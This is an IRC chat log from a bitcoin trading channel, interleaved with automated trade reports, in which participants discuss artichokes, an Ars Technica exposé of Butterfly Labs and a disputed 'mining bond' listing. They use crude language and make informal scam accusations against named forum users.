28 17:29:33 it's a new cryptofruit. Jun 28 17:30:07 ThickAsThieves who's that quote from ? Jun 28 17:30:42 me Jun 28 17:30:52 well done. Jun 28 17:30:53 same thread Jun 28 17:31:18 can I get colored crypto-fruit? Jun 28 17:31:25 yes. Jun 28 17:31:42 o wow, none of you nitpicks caught up with this one : http://trilema.com/2013/statements-regarding-the-mmorpg-under-development-i-v/#comment-93745 Jun 28 17:31:50 is that an anarchist artichoke? Jun 28 17:31:53 thanks god i was thinking of bananas i wouldn't have had a response. Jun 28 17:32:05 deadweasel i may be the first person to grow them in romania Jun 28 17:32:29 are they really artichokes? Jun 28 17:32:35 yup Jun 28 17:32:48 they look tasty. Jun 28 17:32:49 kinda too small for their age i guess, but im boiling them as we speak Jun 28 17:32:57 100% organic and all. Jun 28 17:33:29 excellent! you dip the leaves and scrape the meat off? then eat the hearts in a sauce? or how do you do it? Jun 28 17:33:47 [BTCTC] [AMC-PT] 100 @ 0.002499 = 0.2499 BTC [+] Jun 28 17:33:48 i haven't had good arti-hearts in a while. Jun 28 17:34:23 i'll buy shares of the one on the left. The one on the right doesn't seem to have enough experience. Jun 28 17:34:26 well i don't expect the leaves to be edible really, but we shall see. Jun 28 17:34:49 the part where they connect to the heart, you can dip them and scrape off the meat with your teeth. Jun 28 17:34:58 yes, if they're not too fucking old. Jun 28 17:35:04 these perhaps are. Jun 28 17:35:26 anyway, not really sauce, just a little butter. Jun 28 17:35:54 The plant dies when harvested? or returns next year? Jun 28 17:36:25 it's perpetual. Jun 28 17:36:29 like mint or w/e Jun 28 17:36:41 actually... it's a thistle. that sort of root Jun 28 17:37:39 nice, yours do look extra punk rock. must be the romanian soil. Jun 28 17:38:02 lol Jun 28 17:38:21 romanian soil is such that i have to fight for it with the poppies. Jun 28 17:38:43 [BTCTC] [ASICMINER-PT] 1 @ 3.409999 BTC [+] Jun 28 17:38:45 [BTCTC] [ASICMINER-PT] 1 @ 3.41 BTC [+] Jun 28 17:38:47 [BTCTC] [ASICMINER-PT] 1 @ 3.421 BTC [+] Jun 28 17:38:49 [BTCTC] [ASICMINER-PT] 2 @ 3.4215 = 6.843 BTC [+] Jun 28 17:39:30 [BTCTC] [S.MPOE-PT] 1 @ 0.00099 BTC [-] Jun 28 17:39:31 [BTCTC] [AMC-PT] 400 @ 0.002495 = 0.998 BTC [-] Jun 28 17:40:19 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.0055 = 0.0165 BTC [+] Jun 28 17:40:20 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.00525 = 0.0525 BTC [-] Jun 28 17:40:21 [BTCTC] [TAT.VIRTUALMINE] 200 @ 0.00512 = 1.024 BTC [-] Jun 28 17:40:23 [BTCTC] [B.YABMC] 1 @ 0.00501 BTC [-] Jun 28 17:40:25 [BTCTC] [B.YABMC] 39 @ 0.005 = 0.195 BTC [-] Jun 28 17:41:41 [BTCTC] [B.YABMC] 61 @ 0.005 = 0.305 BTC [-] Jun 28 17:41:43 [BTCTC] [B.YABMC] 10 @ 0.005 = 0.05 BTC [-] Jun 28 17:43:50 [HAVELOCK] [HIM] 6 @ 0.2999 = 1.7994 BTC [+] Jun 28 17:43:56 [HAVELOCK] [HIM] 1 @ 0.29999999 BTC [+] Jun 28 17:44:13 [HAVELOCK] [HIM] 12 @ 0.301 = 3.612 BTC [+] Jun 28 17:44:19 mp, i did catch that a 3rd art method was missing, Jun 28 17:44:25 [HAVELOCK] [HIM] 2 @ 0.305 = 0.61 BTC [+] Jun 28 17:44:34 well it did say three for some reason Jun 28 17:44:37 i just assumed you abstractly meant makign our own websites was the 3rd Jun 28 17:44:45 i dunno what i meant. Jun 28 17:46:57 http://arstechnica.com/business/2013/06/gold-in-them-bits-inside-the-worlds-most-mysterious-bitcoin-mining-company/ Jun 28 17:47:01 Gold in them bits: Inside the world’s most mysterious Bitcoin mining company | Ars Technica Jun 28 17:49:57 "Sonny Chris Vleisides, who pled guilty to one count of mail fraud in 2010 (PDF) for being involved in an international lottery scam, is an executive at BFL. " Jun 28 17:50:09 genesisblock does some real reporting! Jun 28 17:50:14 [BTCTC] [AMC-PT] 180 @ 0.002495 = 0.4491 BTC [-] Jun 28 17:50:16 [BTCTC] [AMC-PT] 1070 @ 0.002495 = 2.6697 BTC [-] Jun 28 17:52:04 [HAVELOCK] [ASICM] 1 @ 0.032958 BTC [+] Jun 28 17:52:44 [BTCTC] [DMS.PURCHASE] 4 @ 0.053705 = 0.2148 BTC [-] Jun 28 17:53:21 [BTCTC] [AMC-PT] 50 @ 0.002494 = 0.1247 BTC [-] Jun 28 17:54:23 wow impresive. Jun 28 17:56:01 Chris Vleisides is reportedly Sonny Vleisides’ stepfather, but we were unable to confirm this with BFL and neither Vleisides responded to repeated requests for interviews. Ghosieri told Ars that the two Vleisides "aren't the same person," but when asked how exactly they were related, he said, "I hope you understand, these things are personal. I can't really answer them without strict authorization—simply because it Jun 28 17:56:01 's not related to me. Simple or complex, it's out of my territory." Jun 28 17:56:38 Cyrus Farivar Jun 28 17:56:38 "Being a good writer is 3% talent, 97% not being distracted by the Internet." Jun 28 17:56:40 i like the guy. Jun 28 17:56:42 [BTCTC] [AMC-PT] 101 @ 0.002451 = 0.2476 BTC [-] Jun 28 17:59:11 “The convention of mail fraud, it’s governmental stuff,” he said. “It’s difficult to explain. Governments actually take action against people for different reasons. It’s not crime always. Certain things like mail fraud, money laundering—[they are] standard [ways] to attack someone. When the government attacks you, and if there’s a point where they’re wrong, there’s Jun 28 17:59:11 no way that they will back off. Backing off means that you would open the door against the government. So the way it works is you always have to agree to some minor thing just to make sure that the government doesn’t end up being wrong.” Jun 28 17:59:14 lol\ Jun 28 18:00:00 dang this article is the real shit Jun 28 18:00:03 "BFL didn’t make that target, and as such, it said it donated 1,000 BTC to the Bitcoin Development Fund (BDF). However, the BDF appears to have been created in May 2013 and provides no documentation that it is, in fact, a bona fide charity or nonprofit organization. Its website lists no actual people, street addresses, or phone numbers. Jun 28 18:00:03 In fact, it turns out that BDF was actually started by Butterfly Labs' own employees—a fact disclosed nowhere on the BDF site. When Ars reached out to the only e-mail address listed on the site, the response that came back was from Jeff Ownby, the BFL vice president." Jun 28 18:00:17 it's a long article Jun 28 18:00:22 sorry i've been reading Jun 28 18:00:41 [BTCTC] [BASIC-MINING] 1 @ 0.1976486 BTC [+] Jun 28 18:00:44 [BTCTC] [AMC-PT] 12 @ 0.002451 = 0.0294 BTC [-] Jun 28 18:01:10 ""BFL could have spent 75 BTC on hookers and blow, but they chose to send it to homeless outreach," King said. "If that was just a PR stunt, I can’t control [that]. What I can control is how I spend that money and use it to spend on people who are less fortunate than I am."" Jun 28 18:01:24 lmao Jun 28 18:01:35 I've given Sean's outpost a good bit myself Jun 28 18:01:40 i like feeding homeless Jun 28 18:01:57 [BTCTC] [BASIC-MINING] 9 @ 0.1976486 = 1.7788 BTC [+] Jun 28 18:01:59 [BTCTC] [AMC-PT] 887 @ 0.002451 = 2.174 BTC [-] Jun 28 18:02:02 [BTCTC] [AMC-PT] 15 @ 0.00245 = 0.0368 BTC [-] Jun 28 18:02:05 [BTCTC] [AMC-PT] 98 @ 0.00245 = 0.2401 BTC [-] Jun 28 18:02:21 yeah, but yours wasn't 0.75% of what you had promised to give, in order to save your fraudulent operation. Jun 28 18:03:05 ijs they picked a decent charity. could give more Jun 28 18:03:06 [BTCTC] [ASICMINER-PT] 5 @ 3.421383 = 17.1069 BTC [-] Jun 28 18:03:09 still shady Jun 28 18:03:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.033885 BTC [+] Jun 28 18:04:04 lol i thought i was on genesisblock.com Jun 28 18:04:10 design is so similar to arsa Jun 28 18:04:14 ars* Jun 28 18:04:16 hehe Jun 28 18:05:28 [BTCTC] [BASIC-MINING] 10 @ 0.1976519 = 1.9765 BTC [+] Jun 28 18:06:08 [BTCTC] [BASIC-MINING] 1 @ 0.19789 BTC [+] Jun 28 18:06:16 [BTCTC] [AMC-PT] 2 @ 0.00245 = 0.0049 BTC [-] Jun 28 18:07:34 [BTCTC] [BASIC-MINING] 1 @ 0.19789 BTC [+] Jun 28 18:07:36 [BTCTC] [BASIC-MINING] 6 @ 0.1979 = 1.1874 BTC [+] Jun 28 18:08:24 [BTCTC] [AMC-PT] 45 @ 0.00245 = 0.1103 BTC [-] Jun 28 18:09:18 [BTCTC] [AMC-PT] 60 @ 0.00244 = 0.1464 BTC [-] Jun 28 18:10:09 [BTCTC] [TAT.ASICMINER] 29 @ 0.033251 = 0.9643 BTC [-] Jun 28 18:10:17 [BTCTC] [BASIC-MINING] 10 @ 0.1979 = 1.979 BTC [+] Jun 28 18:10:20 [BTCTC] [AMC-PT] 153 @ 0.00245 = 0.3749 BTC [+] Jun 28 18:10:25 [BTCTC] [BASIC-MINING] 4 @ 0.1979 = 0.7916 BTC [+] Jun 28 18:10:46 [BTCTC] [BASIC-MINING] 1 @ 0.1999 BTC [+] Jun 28 18:11:15 [BTCTC] [DMS.MINING] 1 @ 0.023182 BTC [+] Jun 28 18:12:00 [BTCTC] [BASIC-MINING] 4 @ 0.1999 = 0.7996 BTC [+] Jun 28 18:14:15 [BTCTC] [AMC-PT] 400 @ 0.00245 = 0.98 BTC [+] Jun 28 18:15:18 [BTCTC] [TAT.ASICMINER] 7 @ 0.033251 = 0.2328 BTC [-] Jun 28 18:15:48 [BTCTC] [TAT.ASICMINER] 10 @ 0.033885 = 0.3389 BTC [+] Jun 28 18:16:07 [BTCTC] [BASIC-MINING] 2 @ 0.1999 = 0.3998 BTC [+] Jun 28 18:16:40 aaaa that artichoke was lovely. Jun 28 18:18:43 [BTCTC] [B.YABMC] 1 @ 0.00407 BTC [-] Jun 28 18:18:53 [BTCTC] [BMF] 9 @ 0.03903 = 0.3513 BTC Jun 28 18:18:55 [BTCTC] [BMF] 1 @ 0.03902 BTC [-] Jun 28 18:18:56 [BTCTC] [BMF] 10 @ 0.039 = 0.39 BTC [-] Jun 28 18:18:57 [BTCTC] [BMF] 10 @ 0.038 = 0.38 BTC [-] Jun 28 18:18:58 [BTCTC] [BMF] 10 @ 0.037 = 0.37 BTC [-] Jun 28 18:18:59 [BTCTC] [BMF] 10 @ 0.036 = 0.36 BTC [-] Jun 28 18:19:01 [BTCTC] [BMF] 10 @ 0.035 = 0.35 BTC [-] Jun 28 18:19:01 how long til the next batch? Jun 28 18:21:05 [BTCTC] [AMC-PT] 413 @ 0.002475 = 1.0222 BTC [+] Jun 28 18:21:18 [BTCTC] [AMC-PT] 8 @ 0.002489 = 0.0199 BTC [+] Jun 28 18:21:40 [BTCTC] [AMC-PT] 7 @ 0.00244 = 0.0171 BTC [-] Jun 28 18:21:49 [BTCTC] [AMC-PT] 100 @ 0.00244 = 0.244 BTC [-] Jun 28 18:22:02 [BTCTC] [B.YABMC] 4 @ 0.00499 = 0.02 BTC [+] Jun 28 18:22:15 [BTCTC] [AMC-PT] 8 @ 0.002436 = 0.0195 BTC [-] Jun 28 18:22:17 [BTCTC] [AMC-PT] 67 @ 0.002435 = 0.1631 BTC [-] Jun 28 18:22:38 [BTCTC] [AMC-PT] 8 @ 0.002435 = 0.0195 BTC [-] Jun 28 18:22:43 [BTCTC] [BASIC-MINING] 10 @ 0.199899 = 1.999 BTC [-] Jun 28 18:22:59 [BTCTC] [AMC-PT] 100 @ 0.00243 = 0.243 BTC [-] Jun 28 18:23:01 [BTCTC] [AMC-PT] 33 @ 0.002427 = 0.0801 BTC [-] Jun 28 18:23:02 [BTCTC] [AMC-PT] 100 @ 0.002427 = 0.2427 BTC [-] Jun 28 18:23:04 [BTCTC] [AMC-PT] 35 @ 0.00242 = 0.0847 BTC [-] Jun 28 18:23:05 [BTCTC] [AMC-PT] 450 @ 0.0024 = 1.08 BTC [-] Jun 28 18:23:07 [BTCTC] [AMC-PT] 1000 @ 0.0024 = 2.4 BTC [-] Jun 28 18:23:08 [BTCTC] [AMC-PT] 1 @ 0.0024 BTC [-] Jun 28 18:23:35 [BTCTC] [AMC-PT] 1000 @ 0.002338 = 2.338 BTC [-] Jun 28 18:24:01 [MPEX] [S.MPOE] 512 @ 0.00083065 = 0.4253 BTC [+] Jun 28 18:24:01 [BTCTC] [AMC-PT] 678 @ 0.002333 = 1.5818 BTC [-] Jun 28 18:24:03 [MPEX] [S.MPOE] 14593 @ 0.00083193 = 12.1404 BTC [+] Jun 28 18:25:04 a week or two ? Jun 28 18:25:14 i dunno, gotta let nature take its course. Jun 28 18:25:31 speaking of which, http://static.tvtropes.org/pmwiki/pub/images/babyfactory_31.png Jun 28 18:26:08 [BTCTC] [BTC-BOND] 30 @ 0.009999 = 0.3 BTC [+] Jun 28 18:26:09 [BTCTC] [AMC-PT] 2322 @ 0.002333 = 5.4172 BTC [-] Jun 28 18:26:11 [BTCTC] [AMC-PT] 100 @ 0.00233 = 0.233 BTC [-] Jun 28 18:26:13 [BTCTC] [AMC-PT] 1000 @ 0.002315 = 2.315 BTC [-] Jun 28 18:26:14 [BTCTC] [AMC-PT] 12666 @ 0.00231 = 29.2585 BTC [-] Jun 28 18:26:16 [BTCTC] [AMC-PT] 1000 @ 0.002301 = 2.301 BTC [-] Jun 28 18:26:17 [BTCTC] [AMC-PT] 632 @ 0.0023 = 1.4536 BTC [-] Jun 28 18:26:18 [BTCTC] [AMC-PT] 1000 @ 0.0023 = 2.3 BTC [-] Jun 28 18:26:20 [BTCTC] [AMC-PT] 5000 @ 0.0023 = 11.5 BTC [-] Jun 28 18:26:20 [BTCTC] [AMC-PT] 500 @ 0.0023 = 1.15 BTC [-] Jun 28 18:26:29 AMC-PT is so fucked Jun 28 18:26:47 people will just keep reposting the cheaper shares just under his wall at 25 Jun 28 18:27:02 heh Jun 28 18:27:20 over on Bitfunder, Jun 28 18:27:35 he's buying up shares and reposting them at 25 himself Jun 28 18:27:59 or "someone" is Jun 28 18:28:11 [BTCTC] [RSM] 1 @ 0.02005 BTC [-] Jun 28 18:28:16 ehhe Jun 28 18:28:42 [BTCTC] [AMC-PT] 200 @ 0.002212 = 0.4424 BTC [-] Jun 28 18:28:44 [BTCTC] [ASICMINER-PT] 1 @ 3.4214 BTC [+] Jun 28 18:28:45 [BTCTC] [AMC-PT] 100 @ 0.002212 = 0.2212 BTC [-] Jun 28 18:28:47 [BTCTC] [ASICMINER-PT] 2 @ 3.4215 = 6.843 BTC [+] Jun 28 18:28:49 [BTCTC] [BTC-BOND] 1 @ 0.009999 BTC [+] Jun 28 18:28:50 [HAVELOCK] [ASICM] 10 @ 0.032955 = 0.3296 BTC [-] Jun 28 18:28:52 [BTCTC] [ASICMINER-PT] 1 @ 3.4218 BTC [+] Jun 28 18:28:53 [BTCTC] [ASICMINER-PT] 1 @ 3.4399 BTC [+] Jun 28 18:28:54 [BTCTC] [ASICMINER-PT] 1 @ 3.44 BTC [+] Jun 28 18:28:56 [BTCTC] [ASICMINER-PT] 2 @ 3.448 = 6.896 BTC [+] Jun 28 18:28:58 [BTCTC] [ASICMINER-PT] 8 @ 3.4487 = 27.5896 BTC [+] Jun 28 18:28:59 [HAVELOCK] [ASICM] 39 @ 0.032801 = 1.2792 BTC [-] Jun 28 18:29:15 i see that on amc-pt Jun 28 18:29:19 that's funny Jun 28 18:29:21 social experimentation, one of the unadvertised uses of bitcoin. Jun 28 18:29:29 [HAVELOCK] [ASICM] 6 @ 0.032801 = 0.1968 BTC [-] Jun 28 18:29:45 [HAVELOCK] [ASICM] 51 @ 0.032801 = 1.6729 BTC [-] Jun 28 18:30:19 [BTCTC] [TAT.VIRTUALMINE] 12 @ 0.005939 = 0.0713 BTC [+] Jun 28 18:31:18 [BTCTC] [AMC-PT] 780 @ 0.0023 = 1.794 BTC [+] Jun 28 18:31:19 [BTCTC] [AMC-PT] 399 @ 0.0024 = 0.9576 BTC [+] Jun 28 18:31:21 [BTCTC] [AMC-PT] 1950 @ 0.002494 = 4.8633 BTC [+] Jun 28 18:31:23 [BTCTC] [AMC-PT] 2970 @ 0.002495 = 7.4102 BTC [+] Jun 28 18:31:23 [BTCTC] [AMC-PT] 1000 @ 0.002498 = 2.498 BTC [+] Jun 28 18:31:25 [BTCTC] [AMC-PT] 1000 @ 0.002498 = 2.498 BTC [+] Jun 28 18:32:06 [BTCTC] [BMF] 5 @ 0.035 = 0.175 BTC [-] Jun 28 18:32:07 [BTCTC] [TAT.ASICMINER] 18 @ 0.033885 = 0.6099 BTC [+] Jun 28 18:32:09 [BTCTC] [TAT.ASICMINER] 4 @ 0.033886 = 0.1355 BTC [+] Jun 28 18:32:33 oh did you guys catch that Garr is issuing a new bond? Jun 28 18:32:48 that auction scammer BFL sockie kid from cognitive Jun 28 18:33:12 and that it somehow got listed on BTCTC without the required 5 votes everyone else has to get Jun 28 18:33:24 legit Jun 28 18:33:33 can i has dividends yet Jun 28 18:33:41 the thread is even better Jun 28 18:33:56 lol Jun 28 18:33:58 wheres thread Jun 28 18:34:15 https://bitcointalk.org/index.php?topic=245375.0 Jun 28 18:34:18 [BTCTC] [TAT.ASICMINER] 12 @ 0.033256 = 0.3991 BTC [-] Jun 28 18:34:23 [FIMB] Fixed-Interest-Mining-Bond on BTC-TC Jun 28 18:34:32 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00512 BTC [-] Jun 28 18:34:34 [BTCTC] [TAT.VIRTUALMINE] 12 @ 0.004953 = 0.0594 BTC [-] Jun 28 18:34:35 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004952 BTC [-] Jun 28 18:34:37 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.004951 = 0.4951 BTC [-] Jun 28 18:34:39 [BTCTC] [TAT.VIRTUALMINE] 186 @ 0.00495 = 0.9207 BTC [-] Jun 28 18:34:39 so basically the various wanna-be exchanges have simply decided to fuck themselves over, to prove this entire theory that "mp doesn't need to bother, you'll suicide" Jun 28 18:34:53 midway into conversation, he decides to doublt the interest rate Jun 28 18:35:07 [BTCTC] [AMC-PT] 60 @ 0.00247 = 0.1482 BTC [-] Jun 28 18:35:08 [BTCTC] [AMC-PT] 1 @ 0.00247 BTC [-] Jun 28 18:35:10 "How is your asset approved so quickly and with less than 5 votes?" he voted himself Jun 28 18:35:29 "1. To the bondholder, you are right that it does not matter what the funds are being used for, so long as the interest is paid." Jun 28 18:35:30 win. Jun 28 18:35:31 [BTCTC] [AMC-PT] 1 @ 0.002494 BTC [+] Jun 28 18:35:38 [BTCTC] [ASICMINER-PT] 5 @ 3.387001 = 16.935 BTC [-] Jun 28 18:35:53 fixed interest anything should raise concerns Jun 28 18:36:06 not really Jun 28 18:36:10 that's a gamble on his part from day one Jun 28 18:36:17 i guess if it's low enough Jun 28 18:36:24 seems sketchy Jun 28 18:36:26 it's totally feasible to pay out a reasonableinterest rate Jun 28 18:36:33 look at Namworld Jun 28 18:36:37 a reasonable rate. i agree Jun 28 18:36:48 i forget what is reasonable Jun 28 18:37:05 yeah he changed it to 2% monthly midstream Jun 28 18:37:09 [BTCTC] [ASICMINER-PT] 1 @ 3.387001 BTC [-] Jun 28 18:37:16 which is pretty risky Jun 28 18:37:30 particularly considering his approach and recent history Jun 28 18:37:58 the sad thing is, I wanna negrate him, but i fear getting onto theymos' radar... Jun 28 18:38:07 didn't he get outed talking to his sock the other day Jun 28 18:38:08 fucked up shit Jun 28 18:38:13 yes Jun 28 18:38:14 that's not much of a valid c oncern. Jun 28 18:38:20 you think? Jun 28 18:38:24 woohoo i'm deceptive. NEW ASSET BIATCHES Jun 28 18:38:25 theymos makes no representation as to having a clue about finance. Jun 28 18:38:43 maybe so, but i use his forum to conduct business Jun 28 18:38:52 bad idea Jun 28 18:38:53 and he could affect my ability to do so in that venue Jun 28 18:38:57 he narrowly escaped with all the parts attached after his glbse share selling lasty year, the last thing he needs any exposure to is playing the rating agency Jun 28 18:39:13 something he actually clearly understands, as displayed by the abandonment of "scammer tags" and the open system Jun 28 18:39:24 [BTCTC] [DMS.MINING] 1 @ 0.02299 BTC [-] Jun 28 18:39:39 fucking politics Jun 28 18:39:49 politics is how the world turns round. Jun 28 18:39:59 without them, it's a crapsack world of everyone's usagi. Jun 28 18:40:14 i'd trust the asset more if it was managed by Garr's sock Jun 28 18:40:18 :-) Jun 28 18:40:42 alter-ego seems more rational Jun 28 18:40:47 this bind is so retarded Jun 28 18:40:49 bond Jun 28 18:41:22 seems like it was written in haste to somehow money grab against the current unpopularity of PMBs Jun 28 18:41:41 but best i can tell it's a mining fund that choses not to pass on the mining Jun 28 18:41:42 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00501 BTC [+] Jun 28 18:41:46 [HAVELOCK] [HIM] 3 @ 0.305 = 0.915 BTC [+] Jun 28 18:41:48 [HAVELOCK] [HIM] 10 @ 0.305 = 3.05 BTC [+] Jun 28 18:41:58 so it's just abind Jun 28 18:42:00 shouldnt it be in the cess pool of long term lending Jun 28 18:42:00 bond Jun 28 18:42:08 or a loan Jun 28 18:42:14 with a high interest rate Jun 28 18:42:18 and high risk Jun 28 18:42:19 maybe patrick will back it Jun 28 18:42:30 hah jborkl Jun 28 18:42:35 or dank Jun 28 18:42:39 seems more like loan Jun 28 18:42:50 but it's called a bond Jun 28 18:43:03 yay bitcoin securities! Jun 28 18:43:13 and listed as a stock Jun 28 18:43:17 i'm gonna get my baby brother in on this shit to debut an asset Jun 28 18:43:36 he's a minor, no way you'll get a dime from him Jun 28 18:43:41 lol Jun 28 18:43:42 [BTCTC] [AMC-PT] 100 @ 0.00222 = 0.222 BTC [-] Jun 28 18:44:06 wait , that already happened. bitcoinman Jun 28 18:44:13 wasnt that the name? Jun 28 18:44:13 like seriously, a 7 year old can create a security, igven enough 30 year olds approve it. Jun 28 18:44:33 bitcoindude Jun 28 18:44:38 something like that Jun 28 18:44:49 "Hi, I'm Garrett. I consider myself extremely ambitious, and historically lucky when it comes to business ventures. My current objective in life is to better society, through whatever means necessary. I thoroughly enjoy innovating, and working on, projects that will somehow positively affect people. I aim to always be an employer, never an employee." Jun 28 18:44:53 http://admitmeplease.org/ Jun 28 18:45:09 yeah. Jun 28 18:45:36 oh gah Jun 28 18:45:57 he says in his own thread "Thread rules: All posts must add to the conversation and be constructive. No spamming." Jun 28 18:45:57 i love to see these kids and their ambition Jun 28 18:47:14 [BTCTC] [AMC-PT] 25 @ 0.002216 = 0.0554 BTC [-] Jun 28 18:47:18 that makes Garr 17 or 18 by his resume Jun 28 18:47:25 assuming he isn't lying and i can add Jun 28 18:48:02 which means he's probably 16 Jun 28 18:48:46 at least he had the sense to make his bond callable Jun 28 18:48:53 unlike Graet or Namworld Jun 28 18:49:25 why is a callable bond sense ? Jun 28 18:49:42 because it needs to end someday, no? Jun 28 18:50:35 it gives you exit strategy, albeit one that might cost you Jun 28 18:50:49 but probably a decent exit strategy given x amount of time Jun 28 18:50:55 what if bitcoin investment market becomes more like the meatspace market, and a reasonable APR is like 5% or whatever Jun 28 18:51:02 these bonds will sell at a premium Jun 28 18:51:07 and he'll be locked in Jun 28 18:51:30 making them callable gives a way out Jun 28 18:51:41 granted he is only offering 1% penalty Jun 28 18:51:46 which is nothing Jun 28 18:52:00 ThickAsThieves this is why bonds have maturity dates. Jun 28 18:52:03 makes the whole thing that much more scammy Jun 28 18:52:13 it may need to end sometime, but it may NOT induce uncertainity in the system Jun 28 18:52:23 because he's offering 2% monthly Jun 28 18:52:27 and could call back for less Jun 28 18:52:36 you can't call back "For less" klamo Jun 28 18:52:57 jesus fuck im trapped in the head of a 5yo! THIS COMMUNITY IS RETARDED Jun 28 18:54:12 suppose he takes the loan and then calls them back 3 weeks later at 1% premium Jun 28 18:54:31 buyer gets shorted 1% Jun 28 18:54:44 no Jun 28 18:54:52 buyer gets shorted all the dd, all the fiscal implications Jun 28 18:55:06 and all the other inconvenience a spontaneously collapsing of its own volition investment structure brings. Jun 28 18:55:27 bonds have terms. there's no such "callable" bs. Jun 28 18:55:46 the reason bonds have terms is because bonds finance a definite something, which means are part of a plan, wjhich plan necessarily has terms to be a plan Jun 28 18:56:01 [BTCTC] [DMS.SELLING] 1 @ 0.0325 BTC [+] Jun 28 18:56:02 so a callable bond is sortof a loan Jun 28 18:56:05 the fact that all teh forum ninnies do not know this and do not wish to bother with this doth not make things different. Jun 28 18:56:19 a callable bond is the equivalent of the fiddy bux you lend to your coworker Jun 28 18:56:32 fuck me i had to say that. now there's going to be an office coffee kitten ipo Jun 28 18:56:54 i'll print flyers and visit the local high schools to raise the capital Jun 28 18:56:56 so if you call it a loan then everything is square? Jun 28 18:57:22 ThickAsThieves no. because you don't "list" loans, even on "Exchanges" Jun 28 18:57:28 Gucci Kitten Bond Mining Company Jun 28 18:57:29 [BTCTC] [TAT.VIRTUALMINE] 14 @ 0.00495 = 0.0693 BTC [-] Jun 28 18:57:30 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.004801 = 0.0144 BTC [-] Jun 28 18:57:31 admitting it's what they are on the strength of it being what they call themselves. Jun 28 18:57:32 [BTCTC] [TAT.VIRTUALMINE] 14 @ 0.0048 = 0.0672 BTC [-] Jun 28 18:57:32 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004755 BTC [-] Jun 28 18:57:33 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004753 BTC [-] Jun 28 18:57:35 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.004752 = 0.4752 BTC [-] Jun 28 18:57:36 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.004751 = 0.4751 BTC [-] Jun 28 18:57:38 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.00475 = 0.0475 BTC [-] Jun 28 18:57:39 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00471 BTC [-] Jun 28 18:57:40 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.004595 = 0.0138 BTC [-] Jun 28 18:57:42 [BTCTC] [TAT.VIRTUALMINE] 8 @ 0.0045 = 0.036 BTC [-] Jun 28 18:57:43 [BTCTC] [TAT.VIRTUALMINE] 360 @ 0.004482 = 1.6135 BTC [-] Jun 28 18:57:45 [BTCTC] [TAT.VIRTUALMINE] 111 @ 0.004481 = 0.4974 BTC [-] Jun 28 18:57:45 [BTCTC] [TAT.VIRTUALMINE] 279 @ 0.00448 = 1.2499 BTC [-] Jun 28 18:58:03 hmm Jun 28 18:58:39 all this shit. all this shit has reasons to exist and causes it's so. Jun 28 18:58:56 tits on men are there for a reason, not because the original bad fanfic writer fucked up. Jun 28 18:58:58 [BTCTC] [COGNITIVE] 1 @ 0.5 BTC [-] Jun 28 18:59:24 loans and bonds are different things for cause. that cause is not "the order in which princess pokemon oliver learned of them" Jun 28 18:59:33 they are there if theres an emergency lactation need. Jun 28 18:59:44 [BTCTC] [AMC-PT] 100 @ 0.002221 = 0.2221 BTC [+] Jun 28 19:00:02 http://www.businessinsider.com/lucas-duplan-raises-25-million-seed-round-for-clinkle-2013-6 Jun 28 19:00:11 [BTCTC] [AMC-PT] 100 @ 0.00222 = 0.222 BTC [-] Jun 28 19:00:30 [BTCTC] [AMC-PT] 10 @ 0.00222 = 0.0222 BTC [-] Jun 28 19:00:32 jcpham yes, yes. rl is so fucked up by now it's probably excessive to even notice how retarded btcworld is. Jun 28 19:00:44 just read it Jun 28 19:00:59 "clinkle" Jun 28 19:01:06 that word will never catch on Jun 28 19:01:19 "just as clunky as the kindle" Jun 28 19:01:51 "We've developed a way for consumers to download an app, no hardware needed" Jun 28 19:01:52 uhhh Jun 28 19:01:53 no telling what it does Jun 28 19:02:03 its a payment app. of course. Jun 28 19:02:05 no details. throw money at the kid Jun 28 19:02:15 [BTCTC] [AMC-PT] 500 @ 0.002215 = 1.1075 BTC [-] Jun 28 19:04:58 [BTCTC] [AMC-PT] 200 @ 0.002212 = 0.4424 BTC [-] Jun 28 19:06:24 [BTCTC] [AMC-PT] 490 @ 0.002221 = 1.0883 BTC [+] Jun 28 19:07:01 [BTCTC] [AMC-PT] 40 @ 0.002221 = 0.0888 BTC [+] Jun 28 19:07:03 [BTCTC] [AMC-PT] 310 @ 0.002211 = 0.6854 BTC [-] Jun 28 19:07:09 [BTCTC] [TAT.ASICMINER] 3 @ 0.033255 = 0.0998 BTC [-] Jun 28 19:07:31 [HAVELOCK] [ASICM] 2 @ 0.03345 = 0.0669 BTC [+] Jun 28 19:08:07 [BTCTC] [TAT.ASICMINER] 47 @ 0.033255 = 1.563 BTC [-] Jun 28 19:08:42 [BTCTC] [DMS.SELLING] 1 @ 0.0325 BTC [+] Jun 28 19:09:54 [BTCTC] [TAT.ASICMINER] 220 @ 0.033364 = 7.3401 BTC [+] Jun 28 19:10:17 [BTCTC] [DMS.SELLING] 37 @ 0.0315 = 1.1655 BTC [-] Jun 28 19:10:18 [BTCTC] [DMS.SELLING] 40 @ 0.031 = 1.24 BTC [-] Jun 28 19:10:20 [BTCTC] [S.MPOE-PT] 1 @ 0.00099 BTC [-] Jun 28 19:10:25 [BTCTC] [AMC-PT] 287 @ 0.002212 = 0.6348 BTC [+] Jun 28 19:11:18 [BTCTC] [DMS.MINING] 9 @ 0.023001 = 0.207 BTC [+] Jun 28 19:11:20 [BTCTC] [DMS.MINING] 1 @ 0.023 BTC [-] Jun 28 19:11:21 [BTCTC] [DMS.MINING] 4 @ 0.02299 = 0.092 BTC [-] Jun 28 19:11:22 [BTCTC] [DMS.MINING] 10 @ 0.02299 = 0.2299 BTC [-] Jun 28 19:11:34 [BTCTC] [TAT.ASICMINER] 10 @ 0.034252 = 0.3425 BTC [+] Jun 28 19:11:49 [BTCTC] [AMC-PT] 5 @ 0.00244 = 0.0122 BTC [+] Jun 28 19:15:25 [MPEX] [S.MPOE] 6583 @ 0.00083044 = 5.4668 BTC [-] Jun 28 19:15:27 [MPEX] 